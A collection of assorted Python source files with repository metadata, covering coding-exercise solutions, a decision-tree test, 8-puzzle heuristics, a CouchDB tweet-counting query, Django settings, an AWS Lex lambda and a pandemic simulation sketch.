"baptiste.lefebvre@ens.fr"
] |
baptiste.lefebvre@ens.fr
|
6c4c40c1e83ecbc68e98234bc754804fb4a8a163
|
5cbd3da4febb37170663f9a76441c6d0e78c54fd
|
/src/programmerslevel2/제이든문자열.py
|
03d812012efa20b0f88bc572a2eb6bbacbf28b1f
|
[] |
no_license
|
knae11/pythonAlgorithm
|
fb07dc73e0c6de9a6da2f169d961148ebc74d54c
|
5a17aae336028628711a9067e31b820ab0ceeb4a
|
refs/heads/main
| 2023-08-22T05:31:06.463927
| 2021-10-08T05:00:53
| 2021-10-08T05:00:53
| 335,243,428
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 346
|
py
|
def solution(s):
answer = ''
process = ''
s += " "
for letter in s:
if letter == " ":
converted = process.capitalize()
answer += converted
process = ''
answer += " "
else:
process += letter
return answer[:-1]
print(solution("3people unFollowed me"))
|
[
"knae11@naver.com"
] |
knae11@naver.com
|
75ca2a91168b539408982c9268062e6b786bbdc9
|
68a5852042c54d6f5b8f6fef3261f4cda9984eda
|
/Decision_Tree/DT_main.py
|
b51ad9e0413ddca4dd3ce5ff29cb4012dfae6889
|
[] |
no_license
|
Qu-Xiangjun/MachineLearning_Zhouzhihua_MyModleCode
|
c95d6c15782e4f8148709ee0274ab1e1232a4261
|
52a02d8c121525a1075ed42b857ebf602ee497d3
|
refs/heads/main
| 2023-02-01T09:49:19.830283
| 2020-12-10T10:25:11
| 2020-12-10T10:25:11
| 320,230,500
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,447
|
py
|
"""
@time: 2020-10-15
@author: Qu Xiangjun 20186471
@describe: 测试自定义的决策树分类算法对西瓜数据集2.0(周志华《机器学习》)二分类
"""
import pandas as pd
import json
from Decision_Tree import Create_Decision_Tree, StoreTree,ReadTree,dtClassify
from draw_decision_tree import create_plot
def load_dataset():
"""
从asv表格导入数据
@return x 训练数据 shape=[6,17] ,
y 训练数据的结果 shape =[1,17],
attribute 属性list,包含字典{属性名称:取值}
eg:[{'色泽': ['浅白', '青绿', '乌黑']}, {'根蒂': ['蜷缩', '硬挺', '稍蜷']}]
"""
filename = 'E:\\Study\\Term5\\Merchine Learning\\Lab\\Lab02\\xigua2.0.csv'
data = pd.read_excel(filename)
    # A 6-row by 17-column matrix: row 1 is color (色泽), row 2 root (根蒂),
    # row 3 sound (敲声), row 4 texture (纹理), row 5 navel (脐部), row 6 touch (触感)
x = [list(data[u'色泽']), list(data[u'根蒂']),
list(data[u'敲声']), list(data[u'纹理']),
list(data[u'脐部']), list(data[u'触感'])]
    # 1 row by 17 columns: the good-melon labels, 1 = good melon, 0 = bad melon
y = list(data[u'好瓜'])
    # attribute name : possible values
attribute = []
attribute_name = ['色泽','根蒂','敲声','纹理','脐部','触感']
for i in range(len(x)):
label = set(x[i])
lable_list = list(label)
dic = {}
dic[attribute_name[i]] = lable_list
attribute.append(dic)
return x,y,attribute
if __name__ == "__main__":
x,y,attribute = load_dataset()
# ans = Create_Decision_Tree(x,y,attribute,method='id3')
# ans = Create_Decision_Tree(x,y,attribute,method='c4.5')
ans = Create_Decision_Tree(x,y,attribute,method='cart')
create_plot(ans)
print(json.dumps(ans, ensure_ascii=False))
    # Persist the model as a JSON file
# StoreTree(ans,'E:\\Study\\Term5\\Merchine Learning\\Lab\\Lab02\\tree_id3.json')
# StoreTree(ans,'E:\\Study\\Term5\\Merchine Learning\\Lab\\Lab02\\tree_c4.5.json')
# StoreTree(ans,'C:\\Users\\49393\\Desktop\\ML_pre\\实验2.1-屈湘钧-20186471-2018计科卓越\\tree_cart.json')
testAns = dtClassify(ans,['色泽','根蒂','敲声','纹理','脐部','触感'], x)
print("y:",y)
    count = 0  # counter used to compute the accuracy
print("test:",testAns)
for i in range(len(y)):
if(y[i] == testAns[i]):
count += 1
print("正确率:%.2f"%(count/len(y)*100.0))
|
[
"quxiangjun@cqu.edu.cn"
] |
quxiangjun@cqu.edu.cn
|
75b146e4891ac523f6d062a2009e4a423e15e259
|
f1e1424ff858b8c636e0bcf412541fd5153cd4d6
|
/Check if Array Is Sorted and Rotated.py
|
bfbfc45db647a120a915ccf7a30dabe2e1ef9941
|
[] |
no_license
|
soma-y1029/TechCodingPractices
|
223d81eb74bfa72b6a946f8027418b8fd056d131
|
cd207dd30ecc23baa9ee014191c38b9ca277d80c
|
refs/heads/master
| 2023-04-02T22:33:27.405753
| 2021-04-06T23:29:14
| 2021-04-06T23:29:14
| 306,386,242
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 558
|
py
|
from typing import List


class Solution:
def check(self, nums: List[int]) -> bool:
if len(nums) < 2: return True
prev = nums[0]
for i, n in enumerate(nums[1:]):
if n < prev: # found place of rotation
# print(n, i+1, prev, nums)
nums = nums[i+1:] + nums[:i+1]
break
prev = n
# check sorted
# print(nums)
prev = nums[0]
for n in nums[1:]:
if prev > n: # not sorted
return False
prev = n
return True
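
# Quick sanity checks (added for illustration; not part of the original LeetCode solution):
if __name__ == '__main__':
    s = Solution()
    print(s.check([3, 4, 5, 1, 2]))  # True: a rotation of the sorted array [1, 2, 3, 4, 5]
    print(s.check([2, 1, 3, 4]))     # False: no rotation of [1, 2, 3, 4] produces this order
    print(s.check([1, 2, 3]))        # True: already sorted (rotation by zero positions)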
|
[
"noreply@github.com"
] |
soma-y1029.noreply@github.com
|
41afd3843af692eb3adb2cfaff20ea5a4e0e7638
|
bf98767ab26c0eed492a4e9817cfcb799ff6b18e
|
/Search/eight_puzzle/heuristics.py
|
8bf6e56e0292acdc5d8f76d06bfc2842e58512b0
|
[] |
no_license
|
surbhi-145/ArtificialIntelligence
|
f291065340ea46f7859be22ae2e207d64591169f
|
785d5faa14a1fc10c9bf412a570718f0cf3a07ab
|
refs/heads/master
| 2022-12-11T07:15:14.947365
| 2020-08-31T06:37:31
| 2020-08-31T06:37:31
| 287,737,029
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,477
|
py
|
'''
Heuristic Functions :
- Manhattan Distance
- No. of Misplaced tiles
- Sqrt of Manhattan Distance
- Max Heuristic max(Manhattan Distance , No. of Misplaced tiles)
'''
import math
def linear(node):
goal = (1, 2, 3, 4, 5, 6, 7, 8, 0)
return sum([1 if node.state[i] != goal[i] else 0 for i in range(8)])
def manhattan(node):
state = node.state
index_goal = {0: [2, 2], 1: [0, 0], 2: [0, 1], 3: [0, 2], 4: [1, 0], 5: [1, 1], 6: [1, 2], 7: [2, 0], 8: [2, 1]}
index_state = {}
index = [[0, 0], [0, 1], [0, 2], [1, 0], [1, 1], [1, 2], [2, 0], [2, 1], [2, 2]]
x, y = 0, 0
for i in range(len(state)):
index_state[state[i]] = index[i]
mhd = 0
for i in range(8):
for j in range(2):
mhd = abs(index_goal[i][j] - index_state[i][j]) + mhd
return mhd
def sqrt_manhattan(node):
state = node.state
index_goal = {0: [2, 2], 1: [0, 0], 2: [0, 1], 3: [0, 2], 4: [1, 0], 5: [1, 1], 6: [1, 2], 7: [2, 0], 8: [2, 1]}
index_state = {}
index = [[0, 0], [0, 1], [0, 2], [1, 0], [1, 1], [1, 2], [2, 0], [2, 1], [2, 2]]
x, y = 0, 0
for i in range(len(state)):
index_state[state[i]] = index[i]
mhd = 0
for i in range(8):
for j in range(2):
mhd = (index_goal[i][j] - index_state[i][j]) ** 2 + mhd
return math.sqrt(mhd)
def max_heuristic(node):
score1 = manhattan(node)
score2 = linear(node)
return max(score1, score2)
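
# Small demonstration (added for illustration, not part of the original module).
# The heuristics only need an object with a `state` attribute holding a 9-tuple,
# so a tiny stand-in node class is enough to exercise them.
if __name__ == '__main__':
    class _Node:
        def __init__(self, state):
            self.state = state

    start = _Node((7, 2, 4, 5, 0, 6, 8, 3, 1))
    print('misplaced tiles:', linear(start))
    print('manhattan distance:', manhattan(start))
    print('sqrt manhattan:', sqrt_manhattan(start))
    print('max heuristic:', max_heuristic(start))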
|
[
"surbhi89.agrawal@gmail.com"
] |
surbhi89.agrawal@gmail.com
|
b49fc24bb43a8a5b1a38eda3db1d1a457f3601fb
|
f401345413420583ca01a2723f66182b3007b76a
|
/bin/python-config
|
16aa730a16e62feacf787e63cf6aedc9ab940946
|
[] |
no_license
|
irslambouf/SyncServer
|
92208cbb00a067aa68348dddacbdde56c41eee1f
|
293c1fef7b65cf84a600c100b23654896e159836
|
refs/heads/master
| 2021-01-21T15:37:12.963847
| 2016-05-18T17:36:33
| 2016-05-18T17:36:33
| 59,137,668
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,344
|
#!/home/philippe/server-full/bin/python
import sys
import getopt
import sysconfig
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
'ldflags', 'help']
if sys.version_info >= (3, 2):
valid_opts.insert(-1, 'extension-suffix')
valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
valid_opts.append('configdir')
def exit_with_usage(code=1):
sys.stderr.write("Usage: {0} [{1}]\n".format(
sys.argv[0], '|'.join('--'+opt for opt in valid_opts)))
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
exit_with_usage()
if not opts:
exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
exit_with_usage(code=0)
for opt in opt_flags:
if opt == '--prefix':
print(sysconfig.get_config_var('prefix'))
elif opt == '--exec-prefix':
print(sysconfig.get_config_var('exec_prefix'))
elif opt in ('--includes', '--cflags'):
flags = ['-I' + sysconfig.get_path('include'),
'-I' + sysconfig.get_path('platinclude')]
if opt == '--cflags':
flags.extend(getvar('CFLAGS').split())
print(' '.join(flags))
elif opt in ('--libs', '--ldflags'):
abiflags = getattr(sys, 'abiflags', '')
libs = ['-lpython' + pyver + abiflags]
libs += getvar('LIBS').split()
libs += getvar('SYSLIBS').split()
# add the prefix/lib/pythonX.Y/config dir, but only if there is no
# shared library in prefix/lib/.
if opt == '--ldflags':
if not getvar('Py_ENABLE_SHARED'):
libs.insert(0, '-L' + getvar('LIBPL'))
if not getvar('PYTHONFRAMEWORK'):
libs.extend(getvar('LINKFORSHARED').split())
print(' '.join(libs))
elif opt == '--extension-suffix':
ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
if ext_suffix is None:
ext_suffix = sysconfig.get_config_var('SO')
print(ext_suffix)
elif opt == '--abiflags':
if not getattr(sys, 'abiflags', None):
exit_with_usage()
print(sys.abiflags)
elif opt == '--configdir':
print(sysconfig.get_config_var('LIBPL'))
|
[
"irslambouf"
] |
irslambouf
|
|
663b39c9a6e21e392ce1a27d195c48aa3e3d88bf
|
192b6b54e0408c00a828072db624ac2f52cb444d
|
/Delete_Node_in_list.py
|
ab806f7cb9c0063706ff50b3fc34114b00a1ff49
|
[] |
no_license
|
yaserahmedn/Leetcode--June-Challenge
|
b0c517de90e974a7d017ba0f984bda83011bf37e
|
4397bde1c99f7322ab30cf3eb691ab293af5316e
|
refs/heads/master
| 2022-10-14T09:06:41.398577
| 2020-06-12T11:58:44
| 2020-06-12T11:58:44
| 268,815,665
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 976
|
py
|
'''
Delete Node in a Linked List
Write a function to delete a node (except the tail) in a singly linked list, given only access to that node.
Given linked list -- head = [4,5,1,9], which looks like the following:
Example 1:
Input: head = [4,5,1,9], node = 5
Output: [4,1,9]
Explanation: You are given the second node with value 5, the linked list should become 4 -> 1 -> 9 after calling your function.
Example 2:
Input: head = [4,5,1,9], node = 1
Output: [4,5,9]
Explanation: You are given the third node with value 1, the linked list should become 4 -> 5 -> 9 after calling your function.
'''
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def deleteNode(self, node):
"""
:type node: ListNode
:rtype: void Do not return anything, modify node in-place instead.
"""
node.val=node.next.val
node.next=node.next.next
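
# Illustrative usage (added; LeetCode normally supplies ListNode, so a minimal
# version is defined here only to exercise the solution):
class ListNode:
    def __init__(self, x):
        self.val = x
        self.next = None

if __name__ == '__main__':
    head = ListNode(4)
    head.next = ListNode(5)
    head.next.next = ListNode(1)
    head.next.next.next = ListNode(9)
    Solution().deleteNode(head.next)  # delete the node holding 5
    values, node = [], head
    while node:
        values.append(node.val)
        node = node.next
    print(values)  # [4, 1, 9]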
|
[
"noreply@github.com"
] |
yaserahmedn.noreply@github.com
|
6e2d3ce0a7edcf543768df76534c06980026ae6d
|
2d82cc5ed46d067f840a8679fc054e5ca0cdd3d3
|
/CODE/Data_Process/Primary_Model/Tweets_Count/Football_italy/italyTweetsCount/OlimpicoRoma.py
|
9058d4d02881d751516336f31718b06035c48fcb
|
[] |
no_license
|
chenvega/COMP90055-COMPUTING-PROJECT-Estimating-Crowds-Based-on-Social-Media
|
ec5e89171994af39188480b8596b0faf7c38a86d
|
7220ed2873729e24827ddf9d0325e7b4c488ff0b
|
refs/heads/master
| 2021-01-10T13:37:06.602347
| 2015-11-03T06:00:06
| 2015-11-03T06:00:15
| 45,310,395
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,078
|
py
|
# Author : Weijia Chen
# Student Number : 616213
# Supervisor : Prof. Richard Sinnott
# Subject: COMP90055 COMPUTING PROJECT
# Project Name : Estimating Crowds Based on Social Media
# This program will count individual number attending one specific
# football match on a corresponding stadium
import couchdb
from couchdb import Server
couch = couchdb.Server('http://localhost:5984')
db = couch['italy']
mapFunc = '''function(doc) {
var a = new Date(Date.parse("Sun Oct 04 00:00:00 +0000 2015"));
var b = new Date(Date.parse("Mon Oct 05 00:00:00 +0000 2015"));
var t = new Date(Date.parse(doc.created_at));
var locations = [12.429343,41.915356,12.480278,41.953303]
if((t>a)&&(t<b)){
if(doc.coordinates != null){
var la = doc.coordinates.coordinates[1];
var lo = doc.coordinates.coordinates[0];
if((lo>locations[0])&&(la>locations[1])&&(lo<locations[2])&&(la<locations[3])){
emit(doc.user.id, 1);
}
}
}
}
'''
reduceFunc = '''function(keys, values,rereduce){
return sum(values);
}'''
result = db.query(mapFunc, reduceFunc, group_level=1)
print len(result)
|
[
"260435413@qq.com"
] |
260435413@qq.com
|
8096da5763075f0b5a0f0373871c0b99d7e55b14
|
5aae5a7ebd03700c122b6e9f7063573e5dc72821
|
/accounts/urls.py
|
be60bca649f8b2fa24d441cae7d925d8359fef81
|
[] |
no_license
|
sandrayousry/djangoLabs
|
e28ab486be010a488812d0a07ab9185a5c21887f
|
d1cad66eaddb8ed6dad99d07b683331829a8c619
|
refs/heads/main
| 2023-03-20T02:55:36.006566
| 2021-03-15T22:29:54
| 2021-03-15T22:29:54
| 347,519,327
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 155
|
py
|
from django.urls import path
# from .views import signup
from . import views
urlpatterns = [
path('signup',views.signup,name="signup"),
]
|
[
"noreply@github.com"
] |
sandrayousry.noreply@github.com
|
8b5cb30d0f2eb905dd9fa8439b1d4bac24e708ae
|
2d4bc7e7c24a918cfe959f37fb759ec3b92c1674
|
/course9/sqlalchemy_example/models.py
|
0b0fb3eea5ce9b8a06002e3958e25e4a64f4585d
|
[] |
no_license
|
zx089/tceh-python
|
a3884e2ded0681a4344c9d32969a78bc4a48df58
|
7589c6f960f2a387c6ef10078f18452743608dc2
|
refs/heads/master
| 2020-05-30T12:55:13.355695
| 2016-04-15T16:20:19
| 2016-04-15T16:20:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,406
|
py
|
# -*- coding: utf-8 -*-
from datetime import date
from app import db
__author__ = 'sobolevn'
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(80), unique=True)
email = db.Column(db.String(120), unique=True)
def __init__(self, username, email):
self.username = username
self.email = email
def __repr__(self):
return '<User %r>' % self.username
def __str__(self):
return repr(self)
class Post(db.Model):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), )
# # index=True) # now let's test it.
user = db.relationship(
'User', backref=db.backref('posts', lazy='dynamic')
)
title = db.Column(db.String(140), unique=True)
content = db.Column(db.String(3000))
# sub_title = db.Column(db.String(140), unique=True)
date_created = db.Column(db.Date, default=date.today())
is_visible = db.Column(db.Boolean, default=True)
def __init__(self, title='', content='', user=None,
date_created=None, is_visible=None):
self.title = title
self.content = content
self.user = user
if date_created is not None:
self.date_created = date_created
if is_visible is not None:
self.is_visible = is_visible
|
[
"mail@sobolevn.me"
] |
mail@sobolevn.me
|
5cf18deede105b09c6d5140b3cc9b5e325e0f2c5
|
6df0d7a677129e9b325d4fdb4bbf72d512dd08b2
|
/Django/ttscase/djvenv/bin/pip
|
1d6258f3f720b9ca0981b0c6c8615694541fafbb
|
[] |
no_license
|
yingxingtianxia/python
|
01265a37136f2ad73fdd142f72d70f7c962e0241
|
3e1a7617a4b6552bce4a7e15a182f30e1bae221e
|
refs/heads/master
| 2021-06-14T15:48:00.939472
| 2019-12-13T05:57:36
| 2019-12-13T05:57:36
| 152,200,507
| 0
| 0
| null | 2021-06-10T20:54:26
| 2018-10-09T06:40:10
|
Python
|
UTF-8
|
Python
| false
| false
| 236
|
#!/data/python/Django/ttscase/djvenv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"root@room8pc205.tedu.cn"
] |
root@room8pc205.tedu.cn
|
|
2ef43e5b57b8f8c20be85e594f3601e5fc4baca0
|
160e0880cc9926e916e3e4295bebeca2e7f45312
|
/lambda/ExchangeMessages.py
|
3a4046c3afed83b63f56fdad78e23f7966f9ab6f
|
[] |
no_license
|
cherudim9/DiningConciergeVirtualAssistant
|
000be94c3121e5f0901916965941ecf9409e2494
|
999646ac718094078ae1835faf6a823c4fdfe0ac
|
refs/heads/master
| 2020-03-09T04:38:16.594755
| 2018-04-08T03:11:30
| 2018-04-08T03:11:30
| 128,592,084
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 539
|
py
|
from __future__ import print_function
import json
import boto3
def lambda_handler(event, context):
data = json.loads(json.dumps(event))
message = data["message"]
userid = data["userId"]
client = boto3.client('lex-runtime')
response = client.post_content(
botName='Testbot',
botAlias = 'chatbot',
userId = userid,
contentType = 'text/plain; charset=utf-8',
inputStream = message,
accept = "text/plain; charset=utf-8"
)
return response['message']
|
[
"cherudim9@gmail.com"
] |
cherudim9@gmail.com
|
d27f53becd30cb01565191e28b3ce9b5bfe45935
|
6659c6f8ef75b98b4fe99e1ff54c22d2c052f44c
|
/app1/admin.py
|
0e88744bf5993b00b446dc44bd7c1ee958df8433
|
[] |
no_license
|
vizul2012/bookstore
|
0b2bbeca8f3eae436017bb125b669498009f5662
|
12c1abc92859efb933422aee3d9594a60ed5d00c
|
refs/heads/master
| 2023-06-09T10:03:00.154938
| 2021-06-26T09:45:17
| 2021-06-26T09:45:17
| 380,463,135
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 112
|
py
|
from django.contrib import admin
from .models import *
# Register your models here
admin.site.register(seller)
|
[
"vizulsuthar1999@gmail.com"
] |
vizulsuthar1999@gmail.com
|
9c330392ee7280a8342cecca64e8c9cc46db19cc
|
e071c0290fbb7a48d1b6ebb04691d378a01c80ff
|
/ex16-1.py
|
109beef186f5fb82c108ff17c7a22d0cebd2c992
|
[] |
no_license
|
dillonius01/LPTHW
|
d6ab9743b108cf10dff0fe850dee4b83828be5a7
|
3250f0fef4f3dbf29d09d81d90fbb58a7b9ba021
|
refs/heads/master
| 2020-04-06T06:55:18.717087
| 2016-08-18T15:28:13
| 2016-08-18T15:28:13
| 48,221,288
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 277
|
py
|
#print "What file would you like to open?"
#filename = raw_input("> ")
#txt = open(filename)
#print "Press RETURN to see the file contents"
#raw_input("> ")
#print txt.read()
from sys import argv
script, filename = argv
txt = open(filename)
print txt.read()
txt.close()
|
[
"dillon.c.powers@gmail.com"
] |
dillon.c.powers@gmail.com
|
49d8e34ba81fb8c503497a2be5ab77f389891bb6
|
c8924684677eec757425fec3b063353cac1675a3
|
/app/config/settings.py
|
4941df16b7a532a3233210301f6b8068c9414459
|
[] |
no_license
|
Fastcampus-WPS-7th/Celery-Tutorial
|
0dc34262ea0e1717df1575f2bc648af35b6f37a2
|
66f9dd009e3492941c2fe889d6a656d1dbd4f9c3
|
refs/heads/master
| 2020-03-07T08:42:28.002826
| 2018-03-30T06:45:59
| 2018-03-30T06:45:59
| 127,386,257
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,220
|
py
|
"""
Django settings for config project.
Generated by 'django-admin startproject' using Django 2.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
CELERY_BROKER_URL = 'redis://localhost:6379/0'
CELERY_RESULT_BACKEND = 'redis://localhost:6379/0'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'dq1j-z+=6xk#+yj%*8yb^krbnomj9kmv*fdph0k+7)*tj==@9f'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_extensions',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'config.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
|
[
"dev@azelf.com"
] |
dev@azelf.com
|
2162026b3b76bf6d2721005cbcb0d68b8d08e474
|
c3f0a636a2f14a02e5f2ff4afea438195f64ecf6
|
/scratch/sub-pop_algorithm_playground.py
|
958287a1e8fa9fd8e76c9801d082f4661b477697
|
[] |
no_license
|
sdodd92/pandemic-sim
|
d6caabb43ff5f08920c41809bd3c0e636062c148
|
0bc8a1edd94c8d2be163239715dd1fcc30b4eabf
|
refs/heads/master
| 2021-04-21T14:06:10.734117
| 2020-10-02T15:32:23
| 2020-10-02T15:32:23
| 249,785,981
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,523
|
py
|
import numpy as np
import seaborn as sns
import pandas as pd
# np.random.seed(5)
class Network:
def __init__(self, raw_network: dict):
self.raw_network = raw_network
def as_table(self):
output = pd.DataFrame(columns=['Source', 'Target', 'weight'])
for node_from in self.raw_network.keys():
for node_to in self.raw_network[node_from].keys():
weight = self.raw_network[node_from][node_to]
if weight > 0:
output = output.append(pd.DataFrame({'Source': [node_from], 'Target': [node_to], 'weight': [weight]}))
return output
class Person:
uid = 0
@classmethod
def inc_uid(cls):
cls.uid += 1
def __init__(self):
self.uuid = self.uid
self.inc_uid()
self.immune = False
self.infected = False
self.alive = True
def __eq__(self, other):
if isinstance(other, Person):
return self.uuid == other.uuid
else:
return other == self
def __ne__(self, other):
if isinstance(other, Person):
return self.uuid != other.uuid
else:
return other != self
def get_disease(self, interactee):
if interactee.infected:
self.infected = True
class Community:
def __init__(self, sociability, pop_size: int=None):
self.population = []
self.pop_uids = []
self.sociability = sociability
self.pop_size = 0
if pop_size:
self.pop_size = pop_size
for i in range(pop_size):
self.add_person(Person())
def interact(self, i, j):
self.population[i].get_disease(self.population[j])
def mingle(self):
pop_size = len(self.population)
for i in range(pop_size):
if self.sociability <= 0:
interactions = pop_size
else:
interactions = int(np.random.poisson(self.sociability, 1))
for interaction in range(interactions):
j = np.random.randint(0, pop_size - 1)
while j == i:
j = np.random.randint(0, pop_size - 1)
self.interact(i, j)
def add_person(self, new_person: Person=None):
if new_person is None:
new_person = Person()
if new_person.uuid in self.pop_uids:
return False
else:
self.population.append(new_person)
self.pop_uids.append(new_person.uuid)
return True
def remove_person(self, member_index: int):
del self.population[member_index]
def kill(self, kill_prob: float):
for person in self.population:
if np.random.uniform() < kill_prob:
person.alive = False
def count_dead(self):
return sum([not person.alive for person in self.population])
class Border:
@staticmethod
def share(country_a: Community, country_b: Community, member_index: int=None):
if member_index is None:
member_index = np.random.randint(0, country_a.pop_size - 1)
result = country_b.add_person(country_a.population[member_index])
return result
def __init__(self, country_a: Community, country_b: Community):
self.country_a = country_a
self.country_b = country_b
def exchange(self, member_index=None):
member_index = self.share(self.country_a, self.country_b, member_index)
self.country_a.remove_person(member_index)
class SubCommunity(Community):
"""
special case of the population specifically designed as a sub-community within a larger nation.
In this case, all members interact with all other members with certain (equal) probability
"""
def __init__(self, interactiveness: float, pop_size: int=None):
super().__init__(-1, pop_size)
self.interactiveness = interactiveness
self.active = {i: True for i in range(pop_size)}
def mingle(self):
pop_size = len(self.population)
for i in range(pop_size):
for j in range(pop_size):
# determine if the alternate interaction selection logic is actually necessary...
if i != j and self.active[i] and self.active[j] and np.random.uniform() < self.interactiveness: # room for algorithm optimization here
self.interact(i, j)
def inactivate(self, id: int):
self.active[id] = False
def reactivate(self, id: int):
self.active[id] = True
class SuperCommunity(Community):
def __init__(self, pop_size: int, clumpiness: float):
super().__init__(0, pop_size) # generate "master population" as normal
# split into sub-communities
un_clumped = pop_size # count how much of the population has not yet been allocated
avg_community_size = int(pop_size * clumpiness)
subcommunities = []
clumped_pop = []
while len(clumped_pop) < pop_size: # do until the entire population has been allocated
community_size = np.random.poisson(avg_community_size, 1)[0] # as a naive method draw pop size from poisson (this is dumb and should be changed)
new_community = Community(0) # initialize the new community with 100% interaction
for n in range(community_size): # populate the community
success = False
while not success: # re-draw if the person has already been allocated in that community
i = np.random.randint(0, pop_size, 1)[0]
success = Border.share(self, new_community, i)
# END while not success
if i not in clumped_pop:
clumped_pop.append(i)
un_clumped -= 1 # increment the allocation counter after successful allocation
# END for n in range(community_size)
# after allocating all members, solidify the community and move on to the next one
subcommunities.append(new_community)
print(len(clumped_pop), end='\r')
# END while un_clumped > 0
self.subcommunities = subcommunities
self.clumped_pop = clumped_pop
def get_network(self):
network = {}
for node_from in self.pop_uids:
network[node_from] = {}
for node_to in self.pop_uids:
if node_to not in network:
network[node_from][node_to] = 0
for community in self.subcommunities:
uids = community.pop_uids
if node_from in uids and node_to in uids:
network[node_from][node_to] += 1
return Network(network)
def mingle(self):
for subpop in self.subcommunities:
subpop.mingle()
class CommunityNetwork(Community):
def __init__(self, pop_size: int):
super().__init__(0, pop_size) # generate un-allocated overall population pool
network = {}
# iteratively draw connections between players
for person_1 in self.pop_uids:
network[person_1] = {}
for person_2 in self.pop_uids:
network[person_1][person_2] = np.random.uniform()
self.interaction_network = network
def mingle(self):
for i, source in self.interaction_network.items():
for j, weight in source.items():
if np.random.uniform() < weight:
self.interact(i, j)
def get_network(self):
return Network(self.interaction_network)
nation_test = SuperCommunity(100, .05)
print(sum([len(sub.population) for sub in nation_test.subcommunities]))
print(sum([len(np.unique([member.uuid for member in sub.population])) for sub in nation_test.subcommunities]))
sizes = [len(np.unique([member.uuid for member in sub.population])) for sub in nation_test.subcommunities]
sns.distplot(sizes)
memberships = []
for uid in nation_test.pop_uids:
membership = 0
for subcommunity in nation_test.subcommunities:
if uid in subcommunity.pop_uids:
membership += 1
memberships.append(membership)
sns.distplot(memberships)
nation_test.kill(.2)
deaths = [sub.count_dead() for sub in nation_test.subcommunities]
sns.distplot(deaths)
len(np.unique(nation_test.clumped_pop))
"""
network_table = Network(nation_test.get_network()).as_table()
network_table.to_csv('/home/sam/Documents/pandemic-sim/debug/pop-network.csv', index=False)
"""
|
[
"dodd429@gmail.com"
] |
dodd429@gmail.com
|
42fa495715d823a9db8a693de3ca18f53ba9d129
|
ee8c4c954b7c1711899b6d2527bdb12b5c79c9be
|
/assessment2/amazon/run/core/controllers/tidy.py
|
a98e9c5baa8c3bcdb82a407edf341a643292ba3c
|
[] |
no_license
|
sqlconsult/byte
|
